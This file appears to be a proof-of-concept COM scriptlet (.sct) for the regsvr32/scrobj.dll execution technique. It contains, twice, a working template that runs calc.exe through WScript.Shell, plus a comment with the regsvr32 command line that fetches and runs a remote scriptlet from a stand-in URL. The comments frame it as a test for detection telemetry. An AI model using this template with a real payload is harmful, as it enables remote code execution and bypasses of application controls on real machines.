SkyBulk/RegSvr32.sct

## RegSvr32.sct
<?XML version="1.0"?>
<scriptlet>
<registration
    progid="PoC"
    classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
	<!-- regsvr32 /s /u /i:http://example.com/file.sct scrobj.dll -->

	<!-- .sct files when downloaded, are executed from a path like this -->
	<!-- Please Note, file extenstion does not matter -->
	<!-- Though, the name and extension are arbitary.. -->
	<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
	<!-- Based on current research, no registry keys are written, since call "uninstall" -->
  	<!-- You can either execute locally, or from a url -->
	<script language="JScript">
		<![CDATA[
	    		// calc.exe should launch, this could be any arbitrary code.
      	   		// What you are hoping to catch is the cmdline, modloads, or network connections, or any variation
			var r = new ActiveXObject("WScript.Shell").Run("calc.exe");

		]]>
</script>
</registration>
</scriptlet>
	<?XML version="1.0"?>
	<scriptlet>
	<registration
	progid="PoC"
	classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
	<!-- regsvr32 /s /u /i:http://example.com/file.sct scrobj.dll -->

	<!-- .sct files when downloaded, are executed from a path like this -->
	<!-- Please Note, file extenstion does not matter -->
	<!-- Though, the name and extension are arbitary.. -->
	<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
	<!-- Based on current research, no registry keys are written, since call "uninstall" -->
	<!-- You can either execute locally, or from a url -->
	<script language="JScript">
	<![CDATA[
	// calc.exe should launch, this could be any arbitrary code.
	// What you are hoping to catch is the cmdline, modloads, or network connections, or any variation
	var r = new ActiveXObject("WScript.Shell").Run("calc.exe");

	]]>
	</script>
	</registration>
	</scriptlet>